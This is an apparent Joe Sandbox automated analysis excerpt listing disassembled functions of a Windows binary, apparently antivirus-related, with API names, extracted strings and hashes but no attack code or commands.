                                                                                  • Associated: 00000003.00000002.2359063412.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                  • Associated: 00000003.00000002.2359136200.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                  • Associated: 00000003.00000002.2359152941.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                  • Associated: 00000003.00000002.2359208093.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_3_2_140000000_9afrYB.jbxd
                                                                                  Similarity
                                                                                  • API ID: AddressProc$Library$Free$CriticalInitializeLoadSection
                                                                                  • String ID: MsiLocateComponentW$msi.dll$vseExec$vseGet$vseGlobalInit$vseGlobalRelease$vseInit$vseRelease$vseSet${7A7E8119-620E-4CEF-BD5F-F748D7B059DA}
                                                                                  • API String ID: 883923345-381368982
                                                                                  • Opcode ID: b9a27f811b976282af616144a97be757c2cf76aa1f8607743da558726ba8644d
                                                                                  • Instruction ID: d19804ac2d128cc8e67db72781ea5cb7b7d89be94dae840b99a82102003c66a5
                                                                                  • Opcode Fuzzy Hash: b9a27f811b976282af616144a97be757c2cf76aa1f8607743da558726ba8644d
                                                                                  • Instruction Fuzzy Hash: F351EEB4221B4191EB52CF26F8987D823A0BB8D7C5F841515EA5E8B3B0EF7AC548C700
                                                                                  Function 0000000140002460 Relevance: 30.1, APIs: 20, Instructions: 110memoryCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000003.00000002.2359077787.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                  • Associated: 00000003.00000002.2359063412.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                  • Associated: 00000003.00000002.2359136200.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                  • Associated: 00000003.00000002.2359152941.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                  • Associated: 00000003.00000002.2359208093.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_3_2_140000000_9afrYB.jbxd
                                                                                  Similarity
                                                                                  • API ID: Heap$CriticalSection$FreeProcess$EnterEventLeave$CloseHandle$MultipleObjectsResetWait
                                                                                  • String ID:
                                                                                  • API String ID: 1613947383-0
                                                                                  • Opcode ID: e9680c11c9d284b0c3aa37b35d301596d2d95dd61f06f1daf2196339e6fd89f5
                                                                                  • Instruction ID: 4415f923c5b49a541c3c18af517eb333de188a5b32bf04682df7988820a44021
                                                                                  • Opcode Fuzzy Hash: e9680c11c9d284b0c3aa37b35d301596d2d95dd61f06f1daf2196339e6fd89f5
                                                                                  • Instruction Fuzzy Hash: 8D51D3BA204A4496E726DF23F85439A6361F79CBD1F044125EB9A07AB4DF39D599C300
                                                                                  Function 0000000140004500 Relevance: 22.6, APIs: 15, Instructions: 73memoryCOMMONLIBRARYCODE
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000003.00000002.2359077787.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                  • Associated: 00000003.00000002.2359063412.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                  • Associated: 00000003.00000002.2359136200.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                  • Associated: 00000003.00000002.2359152941.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                  • Associated: 00000003.00000002.2359208093.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_3_2_140000000_9afrYB.jbxd
                                                                                  Similarity
                                                                                  • API ID: Heap$CriticalSection$FreeProcess$CloseEnterEventHandleLeave$DeleteReset
                                                                                  • String ID:
                                                                                  • API String ID: 1995290849-0
                                                                                  • Opcode ID: 50d905dbcd5d3d8e314177ba4d4162b1dc612bf36ecce00c392234b6cbb64ee5
                                                                                  • Instruction ID: 07b3271e3c5f19e1ab061b13c36c38fadfaaa54878a955e19646b3fb384661b9
                                                                                  • Opcode Fuzzy Hash: 50d905dbcd5d3d8e314177ba4d4162b1dc612bf36ecce00c392234b6cbb64ee5
                                                                                  • Instruction Fuzzy Hash: 7C31D3B6601B41A7EB16DF63F98439833A4FB9CB81F484014EB4A07A35DF39E4B98304
                                                                                  Function 00000001400048A0 Relevance: 22.6, APIs: 15, Instructions: 65memoryCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000003.00000002.2359077787.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                  • Associated: 00000003.00000002.2359063412.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                  • Associated: 00000003.00000002.2359136200.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                  • Associated: 00000003.00000002.2359152941.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                  • Associated: 00000003.00000002.2359208093.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_3_2_140000000_9afrYB.jbxd
                                                                                  Similarity
                                                                                  • API ID: Heap$CriticalSection$FreeProcess$CloseEnterEventHandleLeave$DeleteReset
                                                                                  • String ID:
                                                                                  • API String ID: 1995290849-0
                                                                                  • Opcode ID: 2f4077f28f01d0b1ccc1c48d704ff51649a530c0da5e40bb1ca44111346c6a52
                                                                                  • Instruction ID: fd5ea752b6625aace240e5dc115a6ac8a79eac1ae5096a798ed6b9a4de507a32
                                                                                  • Opcode Fuzzy Hash: 2f4077f28f01d0b1ccc1c48d704ff51649a530c0da5e40bb1ca44111346c6a52
                                                                                  • Instruction Fuzzy Hash: B2311BB4511E0985EB07DF63FC943D423A6BB5CBD5F8D0129AB4A8B270EF3A8499C214
                                                                                  Function 0000000140002DE0 Relevance: 21.2, APIs: 9, Strings: 3, Instructions: 166registryCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000003.00000002.2359077787.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                  • Associated: 00000003.00000002.2359063412.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                  • Associated: 00000003.00000002.2359136200.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                  • Associated: 00000003.00000002.2359152941.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                  • Associated: 00000003.00000002.2359208093.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_3_2_140000000_9afrYB.jbxd
                                                                                  Similarity
                                                                                  • API ID: CriticalSection$EnterLeave$CloseCreateValue
                                                                                  • String ID: ?$SYSTEM\CurrentControlSet\Services\vseamps\Parameters$action
                                                                                  • API String ID: 93015348-1041928032
                                                                                  • Opcode ID: 29268dff0e12a6c2837206cbe8abbe1365c88675c14f20743fcf2bb12703bfc8
                                                                                  • Instruction ID: 955b1bef443a43e40f7389cebc0d05d3cfed999bfec6c75915e9fb821c1678e4
                                                                                  • Opcode Fuzzy Hash: 29268dff0e12a6c2837206cbe8abbe1365c88675c14f20743fcf2bb12703bfc8
                                                                                  • Instruction Fuzzy Hash: E3714676211A4082E762CB26F8507DA73A5F78D7E4F141226FB6A4B7F4DB3AC485C700
                                                                                  Function 0000000140002B40 Relevance: 21.1, APIs: 8, Strings: 4, Instructions: 141libraryloaderCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000003.00000002.2359077787.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                  • Associated: 00000003.00000002.2359063412.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                  • Associated: 00000003.00000002.2359136200.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                  • Associated: 00000003.00000002.2359152941.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                  • Associated: 00000003.00000002.2359208093.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_3_2_140000000_9afrYB.jbxd
                                                                                  Similarity
                                                                                  • API ID: CriticalSection$AddressProc$EnterLeave$LibraryLoad
                                                                                  • String ID: vseqrt.dll$vseqrtAdd$vseqrtInit$vseqrtRelease
                                                                                  • API String ID: 3682727354-300733478
                                                                                  • Opcode ID: a0032026953fb9b355f8eab640deda5175e427bf7f4d2824b31ceb49df98d19c
                                                                                  • Instruction ID: 5756194132ff8dd7ec1522ad033bffa79c37130547d86cec9d6c1639cfe77c95
                                                                                  • Opcode Fuzzy Hash: a0032026953fb9b355f8eab640deda5175e427bf7f4d2824b31ceb49df98d19c
                                                                                  • Instruction Fuzzy Hash: 8C710175220B4186EB52DF26F894BC533A4F78CBE4F441226EA598B3B4DF3AC945C740
                                                                                  Function 00000001400033E0 Relevance: 21.1, APIs: 10, Strings: 2, Instructions: 126memorytimeCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000003.00000002.2359077787.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                  • Associated: 00000003.00000002.2359063412.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                  • Associated: 00000003.00000002.2359136200.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                  • Associated: 00000003.00000002.2359152941.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                  • Associated: 00000003.00000002.2359208093.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_3_2_140000000_9afrYB.jbxd
                                                                                  Similarity
                                                                                  • API ID: Heap$CriticalSection$AllocLeaveProcess$EnterTimerWaitable
                                                                                  • String ID: amps_Init: done, pHandle=%p$amps_Init: iFlags=%d, pid=%d, sid=%d
                                                                                  • API String ID: 2587151837-1427723692
                                                                                  • Opcode ID: 056e3220293f8a27eada56f59a4c806f255f255991a422811975143a91f7a127
                                                                                  • Instruction ID: a7c4065e0455d4df5ce4727384a6dec66c16779501c9bb3b2af2b379a082be6c
                                                                                  • Opcode Fuzzy Hash: 056e3220293f8a27eada56f59a4c806f255f255991a422811975143a91f7a127
                                                                                  • Instruction Fuzzy Hash: 9F5114B5225B4082FB13CB27F8847D963A5F78CBD0F445525BB4A4B7B8DB7AC4448700
                                                                                  Function 0000000140004D10 Relevance: 19.3, APIs: 9, Strings: 2, Instructions: 81libraryloaderCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000003.00000002.2359077787.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                  • Associated: 00000003.00000002.2359063412.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                  • Associated: 00000003.00000002.2359136200.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                  • Associated: 00000003.00000002.2359152941.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                  • Associated: 00000003.00000002.2359208093.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_3_2_140000000_9afrYB.jbxd
                                                                                  Similarity
                                                                                  • API ID: CurrentDirectory$LibraryLoad$AddressAttributesFileHandleModuleProc
                                                                                  • String ID: SetDllDirectoryW$kernel32.dll
                                                                                  • API String ID: 3184163350-3826188083
                                                                                  • Opcode ID: 09225629eee72228c5d7f95fa2eee3f64651a4a6406a600936b89273ecb07b9f
                                                                                  • Instruction ID: 3ea874f08b0d6ae9fbaedd0e680489d05007b391355801732f4c7fbd06edc96d
                                                                                  • Opcode Fuzzy Hash: 09225629eee72228c5d7f95fa2eee3f64651a4a6406a600936b89273ecb07b9f
                                                                                  • Instruction Fuzzy Hash: FD41F6B1218A8582EB22DF12F8547DA73A5F79D7D4F400125EB8A0BAB5DF7EC548CB40
                                                                                  Function 0000000140004BA0 Relevance: 18.1, APIs: 9, Strings: 3, Instructions: 80memorystringCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000003.00000002.2359077787.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                  • Associated: 00000003.00000002.2359063412.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                  • Associated: 00000003.00000002.2359136200.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                  • Associated: 00000003.00000002.2359152941.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                  • Associated: 00000003.00000002.2359208093.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_3_2_140000000_9afrYB.jbxd
                                                                                  Similarity
                                                                                  • API ID: Heap$AllocProcesslstrlen
                                                                                  • String ID: Security=impersonation static true$ampIfEp$ncalrpc
                                                                                  • API String ID: 3424473247-996641649
                                                                                  • Opcode ID: 1d37d06b5998b82bc2dc7011aec07efaf1f4b1bb41d2d67d0687b588f1a55b3d
                                                                                  • Instruction ID: 5475aedf582102907cd33adbfaf34f9b11ebc9e91273ce6565e0ea0cfbbdf015
                                                                                  • Opcode Fuzzy Hash: 1d37d06b5998b82bc2dc7011aec07efaf1f4b1bb41d2d67d0687b588f1a55b3d
                                                                                  • Instruction Fuzzy Hash: FE3137B062A74082FB03CB53BD447E962A5E75DBD8F554019EB0E0BBB6DBBEC1558700
                                                                                  Function 000000014000A740 Relevance: 16.9, APIs: 11, Instructions: 354COMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000003.00000002.2359077787.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                  • Associated: 00000003.00000002.2359063412.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                  • Associated: 00000003.00000002.2359136200.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                  • Associated: 00000003.00000002.2359152941.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                  • Associated: 00000003.00000002.2359208093.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_3_2_140000000_9afrYB.jbxd
                                                                                  Similarity
                                                                                  • API ID: String$ByteCharMultiWide$ErrorLast
                                                                                  • String ID:
                                                                                  • API String ID: 1775797328-0
                                                                                  • Opcode ID: 802883c3254266504f9bffab4fe863b98e9923c524f0017741f2ad98f2b9a469
                                                                                  • Instruction ID: 7820e0e177e3580e7fbac086e7e180635334a87404cd07a7d6eea56579f34d7e
                                                                                  • Opcode Fuzzy Hash: 802883c3254266504f9bffab4fe863b98e9923c524f0017741f2ad98f2b9a469
                                                                                  • Instruction Fuzzy Hash: 7CE18BB27007808AEB66DF26A54079977E1F74EBE8F144225FB6957BE8DB38C941C700
                                                                                  Function 0000000140009C30 Relevance: 16.6, APIs: 11, Instructions: 150COMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • GetEnvironmentStringsW.KERNEL32(?,?,?,?,?,0000000140005C67), ref: 0000000140009C52
                                                                                  • GetLastError.KERNEL32(?,?,?,?,?,0000000140005C67), ref: 0000000140009C6C
                                                                                  • GetEnvironmentStringsW.KERNEL32(?,?,?,?,?,0000000140005C67), ref: 0000000140009C91
                                                                                  • FreeEnvironmentStringsW.KERNEL32(?,?,?,?,?,0000000140005C67), ref: 0000000140009CD4
                                                                                  • FreeEnvironmentStringsW.KERNEL32(?,?,?,?,?,0000000140005C67), ref: 0000000140009CF2
                                                                                  • GetEnvironmentStrings.KERNEL32(?,?,?,?,?,0000000140005C67), ref: 0000000140009D09
                                                                                  • MultiByteToWideChar.KERNEL32(?,?,?,?,?,0000000140005C67), ref: 0000000140009D37
                                                                                  • FreeEnvironmentStringsA.KERNEL32(?,?,?,?,?,0000000140005C67), ref: 0000000140009D73
                                                                                  • FreeEnvironmentStringsA.KERNEL32(?,?,?,?,?,0000000140005C67), ref: 0000000140009E19
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000003.00000002.2359077787.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                  • Associated: 00000003.00000002.2359063412.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                  • Associated: 00000003.00000002.2359136200.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                  • Associated: 00000003.00000002.2359152941.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                  • Associated: 00000003.00000002.2359208093.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_3_2_140000000_9afrYB.jbxd
                                                                                  Similarity
                                                                                  • API ID: EnvironmentStrings$Free$ByteCharErrorLastMultiWide
                                                                                  • String ID:
                                                                                  • API String ID: 1232609184-0
                                                                                  • Opcode ID: 0fe341c893830b3e5934a62294215ba1eeb7ab0cb4f80f00c247d68fe650ca03
                                                                                  • Instruction ID: a97fb2b29f1dbdd40f84dfefdd532c69b8fe37edd6617e3b903b273dff31e607
                                                                                  • Opcode Fuzzy Hash: 0fe341c893830b3e5934a62294215ba1eeb7ab0cb4f80f00c247d68fe650ca03
                                                                                  • Instruction Fuzzy Hash: 9851AEB164564046FB66DF23B8147AA66D0BB4DFE0F484625FF6A87BF1EB78C4448300
                                                                                  Function 0000000140002740 Relevance: 16.6, APIs: 10, Strings: 1, Instructions: 129memoryCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000003.00000002.2359077787.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                  • Associated: 00000003.00000002.2359063412.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                  • Associated: 00000003.00000002.2359136200.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                  • Associated: 00000003.00000002.2359152941.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                  • Associated: 00000003.00000002.2359208093.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_3_2_140000000_9afrYB.jbxd
                                                                                  Similarity
                                                                                  • API ID: Heap$CriticalSection$EnterFreeProcess$Leave
                                                                                  • String ID: H
                                                                                  • API String ID: 2107338056-2852464175
                                                                                  • Opcode ID: 5b70108e8ada33305ec7243e3672b6dc87a1b4650feeecbcfbcd773178ed88ea
                                                                                  • Instruction ID: c1f1c0cc251b461ea163c40135a27997c94af954a8846501eddf5ed74a01cb36
                                                                                  • Opcode Fuzzy Hash: 5b70108e8ada33305ec7243e3672b6dc87a1b4650feeecbcfbcd773178ed88ea
                                                                                  • Instruction Fuzzy Hash: D5513B76216B4086EBA2DF63B84439A73E5F74DBD0F098128EB9D87765EF39C4558300
                                                                                  Function 0000000140003200 Relevance: 15.8, APIs: 6, Strings: 3, Instructions: 100timeCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000003.00000002.2359077787.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                  • Associated: 00000003.00000002.2359063412.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                  • Associated: 00000003.00000002.2359136200.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                  • Associated: 00000003.00000002.2359152941.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                  • Associated: 00000003.00000002.2359208093.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_3_2_140000000_9afrYB.jbxd
                                                                                  Similarity
                                                                                  • API ID: CriticalSection$AddressEnterLeaveProc$LibraryLoadTimerWaitable
                                                                                  • String ID: fnCallback: hScan=%d, evId=%d, context=%p$fnCallback: hScan=%d, putting event %d into listening threads queues$fnCallback: hScan=%d, quarantine, result %d
                                                                                  • API String ID: 1322048431-2685357988
                                                                                  • Opcode ID: 8f454d8f96427bc7f4d6fc52e9fe6703152659d2229fc404623004bd99a71f34
                                                                                  • Instruction ID: ba1df9fb3c509f4e652456910b8147ac8aac6905a945631cefe2604201aedb7e
                                                                                  • Opcode Fuzzy Hash: 8f454d8f96427bc7f4d6fc52e9fe6703152659d2229fc404623004bd99a71f34
                                                                                  • Instruction Fuzzy Hash: 645106B5214B4181EB13CF16F880BD923A4E79DBE4F445622BB594B6B4DF3AC584C740
                                                                                  Function 0000000140003D50 Relevance: 15.8, APIs: 6, Strings: 3, Instructions: 75timeCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000003.00000002.2359077787.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                  • Associated: 00000003.00000002.2359063412.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                  • Associated: 00000003.00000002.2359136200.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                  • Associated: 00000003.00000002.2359152941.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                  • Associated: 00000003.00000002.2359208093.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_3_2_140000000_9afrYB.jbxd
                                                                                  Similarity
                                                                                  • API ID: CriticalSection$EnterLeaveTimerWaitable
                                                                                  • String ID: doCleanup: enter, cAmpEntry %p$doCleanup: pid %d, marking the cAmpEntry pointer for deletion$doCleanup: pid %d, removing cAmpEntry, index is %d
                                                                                  • API String ID: 2984211723-3002863673
                                                                                  • Opcode ID: a738ef0df41c9c2085df25b69143ddd466836247f0acf0cab1fab4ffcf6577b7
                                                                                  • Instruction ID: 6ce834a9fa2c46ab9e722fc1bcf1c858386cde021ca473021475461b430fce50
                                                                                  • Opcode Fuzzy Hash: a738ef0df41c9c2085df25b69143ddd466836247f0acf0cab1fab4ffcf6577b7
                                                                                  • Instruction Fuzzy Hash: 9B4101B5214A8591EB128F07F880B9863A4F78CBE4F495226FB1D0BBB4DB7AC591C710
                                                                                  Function 00000001400021A0 Relevance: 15.8, APIs: 6, Strings: 3, Instructions: 65COMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000003.00000002.2359077787.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                  • Associated: 00000003.00000002.2359063412.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                  • Associated: 00000003.00000002.2359136200.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                  • Associated: 00000003.00000002.2359152941.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                  • Associated: 00000003.00000002.2359208093.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_3_2_140000000_9afrYB.jbxd
                                                                                  Similarity
                                                                                  • API ID: CloseHandleMultipleObjectsOpenProcessWait
                                                                                  • String ID: doMonitor: end process id=%d, result from WaitForMultipleObjects=%d$doMonitor: monitoring process id=%d$fnMonitor: monitor thread for ctx %p
                                                                                  • API String ID: 678758403-4129911376
                                                                                  • Opcode ID: 622955a85f652782e43c0e0864684ab55b88adcc3dc18936af4ab90c870e9f37
                                                                                  • Instruction ID: f397f01a700ed75a1720fb106c04e764a2ecaef09c032a262f7e58a7780e1373
                                                                                  • Opcode Fuzzy Hash: 622955a85f652782e43c0e0864684ab55b88adcc3dc18936af4ab90c870e9f37
                                                                                  • Instruction Fuzzy Hash: B63107B6610A4582EB12DF57F84079963A4E78CBE4F498122FB1C0B7B4DF3AC585C710
                                                                                  Function 0000000140001750 Relevance: 15.1, APIs: 12, Instructions: 133memorystringCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000003.00000002.2359077787.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                  • Associated: 00000003.00000002.2359063412.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                  • Associated: 00000003.00000002.2359136200.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                  • Associated: 00000003.00000002.2359152941.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                  • Associated: 00000003.00000002.2359208093.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_3_2_140000000_9afrYB.jbxd
                                                                                  Similarity
                                                                                  • API ID: Heap$AllocProcesslstrlen
                                                                                  • String ID:
                                                                                  • API String ID: 3424473247-0
                                                                                  • Opcode ID: c17ffa923c8182584db73c91a06df651023cf72d925272b18aed562ea20615b1
                                                                                  • Instruction ID: a11592c0991bfac199573d0d609f53e0c1426f0a5ad78f28403dae96cf8670eb
                                                                                  • Opcode Fuzzy Hash: c17ffa923c8182584db73c91a06df651023cf72d925272b18aed562ea20615b1
                                                                                  • Instruction Fuzzy Hash: C8513AB6701640CAE666DFA3B84479A67E0F74DFC8F588428AF4E4B721DA38D155A700
                                                                                  Function 0000000140012C70 Relevance: 14.4, APIs: 4, Strings: 4, Instructions: 415COMMONLIBRARYCODE
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000003.00000002.2359077787.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                  • Associated: 00000003.00000002.2359063412.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                  • Associated: 00000003.00000002.2359136200.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                  • Associated: 00000003.00000002.2359152941.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                  • Associated: 00000003.00000002.2359208093.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_3_2_140000000_9afrYB.jbxd
                                                                                  Similarity
                                                                                  • API ID: BlockUnwind$BaseEntryFunctionImageLookupThrow
                                                                                  • String ID: bad exception$csm$csm$csm
                                                                                  • API String ID: 3766904988-820278400
                                                                                  • Opcode ID: 211ea14586251fca33d837236c8444fcda6bc332046b6eb3b50ec8ef4bad2153
                                                                                  • Instruction ID: ec44bdd804db6766ea80e989845e9f4c5c79a3e5de674617e5e8a62493c248da
                                                                                  • Opcode Fuzzy Hash: 211ea14586251fca33d837236c8444fcda6bc332046b6eb3b50ec8ef4bad2153
                                                                                  • Instruction Fuzzy Hash: 2202C17220478086EB66DB27A4447EEB7A5F78DBC4F484425FF894BBAADB39C550C700
                                                                                  Function 0000000140004750 Relevance: 13.6, APIs: 9, Instructions: 80sleepCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000003.00000002.2359077787.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                  • Associated: 00000003.00000002.2359063412.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                  • Associated: 00000003.00000002.2359136200.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                  • Associated: 00000003.00000002.2359152941.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                  • Associated: 00000003.00000002.2359208093.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_3_2_140000000_9afrYB.jbxd
                                                                                  Similarity
                                                                                  • API ID: CriticalSection$EnterEventLeaveMultipleObjectsWait$ResetSleep
                                                                                  • String ID:
                                                                                  • API String ID: 2707001247-0
                                                                                  • Opcode ID: 81fbcb92f811cf70c85be9260a27baa2b932eaa25df2b6e09ac4b98cba08ed51
                                                                                  • Instruction ID: f9d573460b216e7eeefce72b36cf093424a31f8579033a03516ac6dab9ef0102
                                                                                  • Opcode Fuzzy Hash: 81fbcb92f811cf70c85be9260a27baa2b932eaa25df2b6e09ac4b98cba08ed51
